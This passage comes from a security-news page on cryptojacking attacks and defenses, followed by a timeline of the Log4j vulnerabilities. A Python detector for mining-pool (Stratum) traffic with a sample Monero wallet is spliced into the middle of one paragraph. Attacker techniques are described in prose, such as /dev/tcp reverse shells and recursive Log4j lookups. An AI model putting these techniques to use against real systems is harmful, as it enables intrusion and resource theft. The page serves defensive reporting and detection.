Attackers generally use scripts to drop the miner payloads onto the initial system and to look for ways to propagate across connected cloud systems.\u003c/p\u003e\n\n\n\n\u003cp\u003e“The profitability and ease of conducting cryptojacking at scale makes this type of attack low-hanging fruit,” said Matt Muir, security researcher for Cado Security,\u0026nbsp;\u003ca href=\"https://www.cadosecurity.com/tales-from-the-honeypot-watchdog-evolves-with-a-new-multi-stage-cryptojacking-attack/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ein a blog post\u003c/a\u003e\u0026nbsp;explaining that cloud-based attacks are particularly lucrative. “This will likely continue for as long as users continue to expose services such as Docker and Redis to untrusted networks.”\u003c/p\u003e\n\n\n\n\u003ch2\u003eWhy cryptojacking is popular\u003c/h2\u003e\n\n\n\n\u003cp\u003eAccording to a\u0026nbsp;\u003ca href=\"https://reasonlabs.com/reports/reasonlabs-report.pdf\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ereport\u003c/a\u003e\u0026nbsp;by ReasonLabs, in the last year 58.4% of all Trojans detected were cryptojacking coin miners. Meantime, another study by SonicWall found that 2021 was the worst year to date for cryptojacking attacks, with the category logging 97.1 million attacks over the course of the year. These numbers are so strong because cryptojacking is virtually minting money for cybercriminals.\u003c/p\u003e\n\n\n\n\u003cp\u003eWhen a crook can mine for cryptocurrency on a seemingly limitless pool of free compute resources from victim machines, the upside for them is huge. 
Even with the precipitous drop in Bitcoin valuation this spring that brought it below the $30,000 level, cryptojackers’ illicit margins still make business sense as the value of what they mine far outstrips the costs of their criminal infrastructure.\u003c/p\u003e\n\n\n\n\u003ch2\u003eReal-world cryptojacking examples\u003c/h2\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eWatchDog targets Docker Engine API endpoints and Redis servers\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eA honeypot from the security research team at Cado Labs\u0026nbsp;\u003ca href=\"https://www.cadosecurity.com/tales-from-the-honeypot-watchdog-evolves-with-a-new-multi-stage-cryptojacking-attack/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ediscovered\u003c/a\u003e\u0026nbsp;a multi-stage cryptojacking attack that targets exposed Docker Engine API endpoints and Redis servers, and can propagate in a worm-like fashion. The attack is perpetrated by the WatchDog attack group, which has been particularly active in late 2021 and 2022 with numerous cryptojacking campaigns.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eAlibaba ECS instances in cryptomining crosshairs\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eTeamTNT was one of the first hacking groups to shift cryptojacking focus heavily to cloud-oriented services. 
Researchers with TrendMicro in late 2021\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/en_us/research/21/k/groups-target-alibaba-ecs-instances-for-cryptojacking.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ereported\u003c/a\u003e\u0026nbsp;that this group, along with rivals like the Kinsing gang, were conducting cryptojacking campaigns that installed miners in Alibaba Elastic Compute Service (ECS) instances and disabled security features to evade detection.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eMiner bots and backdoors use Log4J to attack VMware Horizon servers\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eThe Log4Shell vulnerability has been a boon to cryptojacking attackers in 2022. In one marked example, Sophos researchers\u0026nbsp;\u003ca href=\"https://news.sophos.com/en-us/2022/03/29/horde-of-miner-bots-and-backdoors-leveraged-log4j-to-attack-vmware-horizon-servers/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003efound\u003c/a\u003e\u0026nbsp;earlier this year that a ‘horde’ of attackers were targeting VMware Horizon servers to deliver a range of cryptojacking payloads that included the z0Miner, the JavaX miner and at least two XMRig variants, Jin and Mimu cryptocurrency miner bots.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eSupply chain attacks via npm libraries\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eThe software supply chain security experts at Sonatype in fall of 2021 sounded the alarm on malicious cryptomining packages hiding in npm, the JavaScript package repository used by developers worldwide. 
At the time it found a trio of packages, at least one of which was impersonating a popular, legitimate library used by developers called “ua-parser-js,” which gets over 7 million weekly downloads and would be an ideal way to lure in developers to accidentally download a malicious bit of code and install it in their software.\u003c/p\u003e\n\n\n\n\u003cp\u003eA few months after that report, researchers at WhiteSource (now Mend) released an\u0026nbsp;\u003ca href=\"https://www.mend.io/npm-threat-report-for-javascript-package-registry/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eadditional report\u003c/a\u003e\u0026nbsp;that showed npm is swarming with malicious code—as many as 1,300 malicious packages that include cryptojacking and other nefarious behavior.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eRomanian attackers target Linux machines with cryptomining malware\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eLast summer Bitdefender\u0026nbsp;\u003ca href=\"https://www.bitdefender.com/blog/labs/how-we-tracked-a-threat-group-running-an-active-cryptojacking-campaign\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ediscovered\u003c/a\u003e\u0026nbsp;a Romanian threat group that was targeting Linux-based machines with weak SSH credentials to deploy Monero mining malware. The tools they used were distributed on an as-a-service model. This example was on the spear tip of what appears to be a growing trend of Linux system cryptomining attacks. 
A\u0026nbsp;\u003ca href=\"https://ir.vmware.com/websites/vmware/English/2120/us-press-release.html?airportNewsID=47b6e25a-5a8b-4189-b20d-99a6da9b1663\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ereport\u003c/a\u003e\u0026nbsp;earlier this year from VMware detailed a growing targeting of Linux-based multi-cloud environments, particularly using the XMRig mining software.\u003c/p\u003e\n\n\n\n\u003cp\u003e“Many of the cryptomining samples from Linux-based systems have some relationship to the XMRig application,” explained the report, which showed that 89% of cryptomining attacks used XMRig-related libraries. “Therefore, when XMRig-specific libraries and modules in Linux binaries are identified, it is likely evidence of potential cryptomining behavior.”\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eCoinStomp uses sophisticated evasion tactics\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eCoinStomp is another cryptojacking campaign recently discovered to be targeting Asian cloud service providers (CSPs). This one distinguished itself by its anti-forensics and evasion measures. These included timestomping to manipulate system timestamps, removal of system cryptographic policies, and the use of bash’s /dev/tcp pseudo-device to create a reverse shell session, explained Cado’s Muir in a\u0026nbsp;\u003ca href=\"https://www.cadosecurity.com/coinstomp-malware-family-targets-asian-cloud-service-providers/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ereport\u003c/a\u003e\u0026nbsp;on the attack.\u003c/p\u003e\n\n\n\n\u003ch3\u003e\u003cstrong\u003eCryptocurrency farm found in warehouse\u003c/strong\u003e\u003c/h3\u003e\n\n\n\n\u003cp\u003eCryptojackers can sometimes go to great lengths to steal not only processing power but also energy and network resources from corporate infrastructure. 
Last year Darktrace analysts\u0026nbsp;\u003ca href=\"https://www.darktrace.com/en/blog/crypto-mining-malware-uncovering-a-cryptocurrency-farm-in-a-warehouse/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003ehighlighted\u003c/a\u003e\u0026nbsp;an anonymous example from one of its clients where it discovered a cryptomining farm in a warehouse that was disguised inside an unassuming set of cardboard boxes. Inside was a stealthy rig running multiple GPUs that were hooked into the company’s network and power.\u003c/p\u003e\n\n\n\n\u003ch2\u003eHow to prevent cryptojacking\u003c/h2\u003e\n\n\n\n\u003cp\u003eAs it has evolved into a multi-vector attack that spans across endpoint, server, and cloud resources, preventing cryptojacking takes an orchestrated and well-rounded defense strategy. The following steps can help prevent cryptojacking from running rampant on enterprise resources.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eEmploy strong endpoint protection.\u003c/strong\u003e\u0026nbsp;The foundation of that is using endpoint protection and anti-malware that’s capable of detecting cryptominers, as well as keeping web filters up to date and managing browser extensions to minimize the risk of browser-based scripts executing. Organizations should ideally look for endpoint protection platforms that can extend out to servers and beyond.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003ePatch and harden servers (and everything else).\u003c/strong\u003e\u0026nbsp;Cryptojackers tend to look for the lowest hanging fruit that they can quietly harvest—that includes scanning for publicly exposed servers containing older vulnerabilities. 
Basic server hardening that includes patching, turning off unused services, and limiting external footprints can go a long way toward minimizing the risk of server-based attacks.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eUse software composition analysis.\u0026nbsp;\u003c/strong\u003e\u003ca href=\"https://www.csoonline.com/article/3640808/software-composition-analysis-explained-and-how-it-identifies-open-source-software-risks.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eSoftware composition analysis (SCA)\u003c/a\u003e\u0026nbsp;tools provide better visibility into what components are being used within software to prevent supply chain attacks that leverage coin mining scripts.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eHunt down cloud misconfigurations.\u0026nbsp;\u003c/strong\u003eOne of the most impactful ways organizations can stop cryptojacking in the cloud is by tightening cloud and container configurations. That means finding cloud services exposed to the public internet without proper authentication, rooting out exposed API servers, and eliminating credentials and other secrets stored in developer environments and hardcoded into applications.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eHow to detect cryptojacking\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eCryptojacking is a classic low-and-slow cyberattack designed to leave minimal signs behind to avoid long-term detection. While endpoint protection platforms and endpoint detection and response technologies have come a long way in alerting to cryptojacking attacks, the bad guys are masters of evasion on this front and detecting illicit coin miners can still prove difficult, especially when only a few systems are compromised. 
The following are some additional methods for flagging signs of cryptojacking.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eTrain your help desk to look for signs of cryptomining.\u003c/strong\u003e\u0026nbsp;Sometimes the first indication on user endpoints is a spike in help desk complaints about slow computer performance. That should raise a red flag to investigate further, as could devices over-heating or poor battery performance in mobile devices.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eDeploy a network monitoring solution.\u003c/strong\u003e\u0026nbsp;Network monitoring tools are a powerful way to pick up on the kinds of web traffic and outbound C2 traffic that indicate cryptojacking activity, no matter the device it is coming from.\u003c/p\u003e\n\n\n\n\u003cp\u003e“If you have good egress filtering on a server where you’re watching for outbound connection initiation, that can be good detection for [cryptomining malware],” says Travis Farral, vice president and CISO at Archaea Energy. He warns, though, that cryptominer authors can write their malware to avoid that detection method.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eUse cloud monitoring and container runtime security.\u0026nbsp;\u003c/strong\u003eEvolving tools like cloud monitoring and container runtime security scanning can offer additional visibility into cloud environments that may be impacted by unauthorized cryptominers. Cloud providers are baking in this kind of visibility into their service, sometimes as add-ons. 
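\u003cp\u003eThe network-monitoring and egress-filtering advice above can be made concrete. Miners talk to their pool over the Stratum protocol, which is newline-delimited JSON-RPC, and the first message a Monero miner sends is a \u003cem\u003elogin\u003c/em\u003e carrying the wallet address. The Python below is an added example, not code from the article or from any vendor it quotes: it runs over constructed egress flow records that keep the first client bytes (the record format, the internal addresses and the second, Bitcoin-style session are assumptions) and reports which flows speak Stratum, the method seen, the wallet presented, and whether that wallet has the shape of a Monero address. The Monero wallet used in the sample is the one listed in the IOCs earlier on this page.\u003c/p\u003e

```python
"""Flag mining-pool (Stratum) sessions in egress telemetry that keeps the first client bytes."""
import json
import re

# Stratum methods used by XMRig-style Monero miners (login/submit/keepalived)
# and by Bitcoin-style miners (mining.*).
STRATUM_METHODS = {
    "login", "submit", "keepalived",
    "mining.subscribe", "mining.authorize", "mining.submit",
    "mining.extranonce.subscribe",
}
# Monero standard address or subaddress: 95 base58 characters starting with 4 or 8.
MONERO_ADDR = re.compile(r"[48][1-9A-HJ-NP-Za-km-z]{94}")

# Wallet quoted in the IOC list above; used here only as sample input.
MONERO_WALLET = ("46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsav"
                 "KXo3eGf5ZRb4qJzFXLVHGYH4moQ")

# Constructed flow records (not real captures); destinations are RFC 5737 ranges.
FLOWS = [
    # TLS client hello: opaque to this check, so it must be handled by other means.
    {"src": "10.0.0.5", "dst": "203.0.113.50:443",
     "payload": b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03"},
    # XMRig-style Monero login on a typical pool port.
    {"src": "10.0.0.5", "dst": "203.0.113.77:3333",
     "payload": json.dumps({"id": 1, "jsonrpc": "2.0", "method": "login",
                            "params": {"login": MONERO_WALLET, "pass": "x",
                                       "agent": "XMRig/6.16.4", "algo": ["rx/0"]}}).encode() + b"\n"},
    # Bitcoin-style subscribe followed by authorize ("wallet.worker" convention).
    {"src": "10.0.0.9", "dst": "203.0.113.88:4444",
     "payload": b"\n".join(json.dumps(m).encode() for m in [
         {"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]},
         {"id": 2, "method": "mining.authorize", "params": ["bc1qexamplewallet.rig01", "x"]},
     ]) + b"\n"},
    # JSON-RPC that is not mining: must not be flagged.
    {"src": "10.0.0.12", "dst": "203.0.113.99:8545",
     "payload": json.dumps({"jsonrpc": "2.0", "id": 7, "method": "eth_blockNumber",
                            "params": []}).encode() + b"\n"},
]


def stratum_messages(payload):
    """Yield parsed Stratum JSON-RPC objects from newline-delimited client bytes."""
    for raw in payload.splitlines():
        try:
            msg = json.loads(raw.decode("utf-8"))
        except (UnicodeDecodeError, ValueError):
            continue                      # binary or non-JSON first bytes
        if isinstance(msg, dict) and msg.get("method") in STRATUM_METHODS:
            yield msg


def wallet_from(msg):
    """Return the wallet/worker identity a miner presents, or None for messages without one."""
    params = msg.get("params")
    if isinstance(params, dict):
        return params.get("login")        # Monero-style login
    if isinstance(params, list) and msg["method"] == "mining.authorize" and params:
        return params[0].split(".", 1)[0]  # strip the worker suffix
    return None


def find_miners(flows):
    """One finding per flow that speaks Stratum: (dst, method, wallet, looks_like_monero)."""
    findings = []
    for flow in flows:
        for msg in stratum_messages(flow["payload"]):
            wallet = wallet_from(msg)
            if wallet is None:
                continue                  # subscribe alone carries no identity
            findings.append((flow["dst"], msg["method"], wallet,
                             bool(MONERO_ADDR.fullmatch(wallet))))
            break
    return findings


if __name__ == "__main__":
    for dst, method, wallet, is_xmr in find_miners(FLOWS):
        print(f"{dst}\t{method}\t{wallet}\tmonero={is_xmr}")
```

\u003cp\u003eThe first record is the caveat Farral raises: a pool reached over TLS (“stratum+ssl”) shows nothing parseable, so for those sessions the only signals are destination reputation, the long-lived, low-bandwidth connection profile with periodic keepalives, and the endpoint telemetry on the host. The wallet, when it is visible, is the most durable indicator to pivot on, since it survives pool and IP changes.\u003c/p\u003e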
For instance, Google Cloud expanded its Security Command Center earlier this year to include what it calls its Virtual Machine Threat Detection (VMTD) to pick up on signs of cryptomining in the cloud, among other cloud threats.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eEngage in regular threat hunts.\u0026nbsp;\u003c/strong\u003eSince so many cryptojacking attacks are stealthy and leave few tracks, organizations may need to take more active measures like threat hunting to regularly seek out subtle signs of compromise and follow through with investigations.\u003c/p\u003e\n\n\n\n\u003cp\u003e“Endpoint security and SOC teams should invest time into active exercises and threat hunts instead of waiting around for something potentially catastrophic to happen,” LogRhythm’s Vincent says.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eMonitor your websites for cryptomining code\u003c/strong\u003e. Farral warns that cryptojackers are finding ways to place bits of Javascript code on web servers. “The server itself isn’t the target, but anyone visiting the website itself [risks infection],” he says. He recommends regularly monitoring for file changes on the web server or changes to the pages themselves.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eHow to respond to a cryptojacking attack\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eAfter illicit cryptomining activity has been detected, responding to a cryptojacking attack should follow standard cyber incident response steps that include containment, eradication, recovery, and lessons learned. Some tips for how to respond to a cryptojacking attack include:\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eKill web-delivered scripts.\u0026nbsp;\u003c/strong\u003eFor in-browser JavaScript attacks, the solution is simple once cryptomining is detected: Kill the browser tab running the script. 
IT should note the website URL that’s the source of the script and update the company’s web filters to block it.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eShut down compromised container instances.\u0026nbsp;\u003c/strong\u003eImmutable cloud infrastructure like container instances that are compromised with coin miners can also be handled simply, by shutting down infected container instances and starting fresh. However, organizations must dig into the root causes that led to the container compromise in the first place. This means looking for signs that the container dashboard and credentials have been compromised and examining connected cloud resources for signs of compromise. A key step is ensuring that the fresh new container image to replace the old one isn’t similarly configured.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eReduce permissions and regenerate API keys.\u0026nbsp;\u003c/strong\u003eEradicating and fully recovering from cloud-based cryptojacking will require organizations to reduce permissions to impacted cloud resources (and those connected to them) and regenerating API keys to prevent attackers from walking right back into the same cloud environment.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003eLearn and adapt.\u003c/strong\u003e\u0026nbsp;Use the experience to better understand how the attacker was able to compromise your systems. 
Update your user, helpdesk, IT, and SOC analyst training so they are better able to identify cryptojacking attempts and respond accordingly.\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003cem\u003eEditor’s note: This article, originally published in February 2018, has been updated to include new research, best practices, and cryptojacking examples.\u003c/em\u003e\u003c/p\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003ch1\u003eThe Apache Log4j vulnerabilities: A timeline\u003c/h1\u003e\n\n\n\n\u003ch3\u003eThe Apache Log4j vulnerability has impacted organizations around the globe. Here is a timeline of the key events surrounding the Log4j exploit as they have unfolded.\u003c/h3\u003e\n\n\n\n\u003cp\u003eThe\u0026nbsp;\u003ca href=\"https://www.csoonline.com/article/3644472/apache-log4j-vulnerability-actively-exploited-impacting-millions-of-java-based-apps.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eApache Log4j vulnerability\u003c/a\u003e\u0026nbsp;has made global headlines since it was discovered in early December 2021. The flaw has impacted vast numbers of organizations around the world as security teams have scrambled to mitigate the associated risks. Here is a timeline of the key events surrounding the Log4j vulnerability as they have unfolded.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eThursday, December 9: Apache Log4j zero-day exploit discovered\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eApache released details on a critical vulnerability in Log4j, a logging library used in millions of Java-based applications. Attackers began exploiting the flaw (CVE-2021-44228), dubbed “Log4Shell”, which was rated 10 out of 10 on the CVSS vulnerability rating scale. It could lead to remote code execution (RCE) on underlying servers that run vulnerable applications. 
“An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled,” Apache developers wrote in an advisory. A fix for the issue was made available with the release of Log4j 2.15.0 as security teams from around the globe worked to protect their organizations. Businesses were urged to install the latest version.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eFriday, December 10: UK NCSC issues Log4j warning to UK organizations\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eAs the fallout from the vulnerability continued, the UK’s National Cyber Security Centre (NCSC) issued a\u0026nbsp;\u003ca href=\"https://www.ncsc.gov.uk/news/apache-log4j-vulnerability\" rel=\"noreferrer noopener\" target=\"_blank\"\u003epublic warning\u003c/a\u003e\u0026nbsp;to UK companies about the flaw and outlined strategies for mitigation. The NCSC advised all organizations to install the latest update immediately wherever Log4j was known to be used. “This should be the first priority for all UK organizations using software that is known to include Log4j. Organizations should update both internet-facing and non-internet facing software,” the statement read. Businesses were also urged to seek out unknown instances of Log4j and deploy protective network monitoring/blocking.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eSaturday, December 11: CISA director comments on “urgent challenge to network defenders”\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eMuch like the UK’s NCSC, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) publicly responded to the Log4j vulnerability with director Jen Easterly reflecting upon the urgent challenge it presented to network defenders. 
“CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the Log4j software library,” she said in a\u0026nbsp;\u003ca href=\"https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability\" rel=\"noreferrer noopener\" target=\"_blank\"\u003estatement\u003c/a\u003e. “We are taking urgent action to drive mitigation of this vulnerability and detect any associated threat activity. We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies – and signals to non-federal partners – to urgently patch or remediate this vulnerability. We are proactively reaching out to entities whose networks may be vulnerable and are leveraging our scanning and intrusion detection tools to help government and industry partners identify exposure to or exploitation of the vulnerability.”\u003c/p\u003e\n\n\n\n\u003cp\u003eCISA recommended asset owners to take three additional, immediate steps to help mitigate the vulnerability:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eEnumerate any external facing devices that have Log4j installed\u003c/li\u003e\n\n\n\n\u003cli\u003eEnsure security operations centers are actioning every single alert on the devices that fall into the category above\u003c/li\u003e\n\n\n\n\u003cli\u003eInstall a web application firewall with rules that automatically update so that security operations centers (SOCs) can concentrate on fewer alerts\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eTuesday, December 14: Second Log4j vulnerability carrying denial-of-service threat detected, new patch released\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eA second vulnerability impacting Apache Log4j was discovered. 
The new flaw, CVE-2021-45046, allowed malicious actors to craft malicious input data using a JNDI lookup pattern to create denial-of-service (DoS) attacks, according to the\u0026nbsp;\u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eCVE description\u003c/a\u003e. A new\u0026nbsp;\u003ca href=\"https://logging.apache.org/log4j/2.x/download.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003epatch for the exploit\u003c/a\u003e\u0026nbsp;was made available, which removed support for message lookup patterns and disabled JNDI functionality by default, with the Log4j 2.15.0 fix for the original flaw incomplete in certain non-default configurations.\u003c/p\u003e\n\n\n\n\u003cp\u003e“While CVE-2021-45046 is less severe than the original vulnerability, it becomes another vector for threat actors to conduct malicious attacks against unpatched or improperly patched systems,” Amy Chang, head of risk and response at Resilience, told CSO shortly after the flaw was discovered. “The incomplete patch to CVE-2021-44228 could be abused to craft malicious input data, which could result in a DoS attack. A DoS attack can shut down a machine or network and render it inaccessible to its intended users,” she added. Organizations were advised to update to Log4j 2.16.0 as soon as possible.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eFriday, December 17: Third Log4j vulnerability revealed, new fix made available\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eApache published details of a third major Log4j vulnerability and made yet another fix available. This was an infinite recursion flaw rated 7.5 out of 10. 
“The Log4j team has been made aware of a security vulnerability,\u0026nbsp;\u003ca href=\"https://logging.apache.org/log4j/2.x/download.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eCVE-2021-45105\u003c/a\u003e, that has been addressed in\u0026nbsp;\u003ca href=\"https://logging.apache.org/log4j/2.x/download.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eLog4j 2.17.0\u003c/a\u003e\u0026nbsp;for Java 8 and up,” it wrote. “Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DoS (denial-of-service) attack.”\u003c/p\u003e\n\n\n\n\u003cp\u003eApache also outlined the following mitigations:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eIn PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC)\u003c/li\u003e\n\n\n\n\u003cli\u003eOtherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eMonday, December 20: Log4j exploited to install Dridex and Meterpreter\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eCybersecurity research group Cryptolaemus warned that the\u0026nbsp;\u003ca href=\"https://twitter.com/Cryptolaemus1/status/1472939659760185346\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eLog4j vulnerability was being exploited\u003c/a\u003e\u0026nbsp;to infect Windows devices with the Dridex banking Trojan and 
Linux devices with Meterpreter. Dridex is a form of malware that steals bank credentials via a system that uses macros from Microsoft Word, while Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore a target machine and execute code. Cryptolaemus member Joseph Roosen told\u0026nbsp;\u003ca href=\"https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eBleepingComputer\u003c/a\u003e\u0026nbsp;that threat actors use the Log4j RMI (Remote Method Invocation) exploit variant to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eWednesday, December 22: Data shows 10% of all assets vulnerable to Log4Shell\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eData released by cybersecurity vendor Tenable revealed that one in 10 of all assets were vulnerable to Log4Shell, while 30% of organizations had not begun scanning for the bug. “Of the assets that have been assessed, Log4Shell has been found in approximately 10% of them, including a wide range of servers, web applications, containers and IoT devices,” read a\u0026nbsp;\u003ca href=\"https://www.tenable.com/blog/one-in-10-assets-assessed-are-vulnerable-to-log4shell?utm_source=charge\u0026amp;utm_medium=social\u0026amp;utm_campaign=internal-comms\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eTenable blog posting\u003c/a\u003e. “Log4Shell is pervasive across all industries and geographies. One in 10 corporate servers being exposed. One in 10 web applications and so on. 
One in 10 of nearly every aspect of our digital infrastructure has the potential for malicious exploitation via Log4Shell.”\u003c/p\u003e\n\n\n\n\u003cp\u003eThe vendor warned that Log4Shell carries a greater potential threat than EternalBlue (exploited in the WannaCry attacks) because of the pervasiveness of Log4j across both infrastructure and applications. “No single vulnerability in history has so blatantly called out for remediation. Log4Shell will define computing as we know it, separating those that put in the effort to protect themselves and those comfortable being negligent,” it added.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eTuesday, January 4: FTC tells companies to patch Log4j vulnerability, threatens legal action\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eThe Federal Trade Commission (FTC) urged U.S. organizations to patch the Log4Shell vulnerability immediately or risk facing punitive action from the agency. “When vulnerabilities are discovered and exploited, it risks a loss or breach of personal information, financial loss, and other irreversible harms. The duty to take reasonable steps to mitigate known software vulnerabilities implicates laws including, among others, the Federal Trade Commission Act and the Gramm Leach Bliley Act,” the\u0026nbsp;\u003ca href=\"https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eFTC said\u003c/a\u003e. It added that it is critical that companies and their vendors relying on Log4j act now to reduce the likelihood of harm to consumers and to avoid FTC legal action. 
“The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.”\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eMonday, January 10: Microsoft warns of China-based ransomware operator exploiting Log4Shell\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eMicrosoft updated its\u0026nbsp;\u003ca href=\"https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#NightSky\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eLog4j vulnerability guidance page\u003c/a\u003e\u0026nbsp;with details of a China-based ransomware operator (DEV-0401) targeting internet-facing systems and deploying the NightSky ransomware. “As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon,” it wrote. “DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).” Based on Microsoft’s analysis, attackers were discovered to be using command and control (CnC) servers that spoof legitimate domains. 
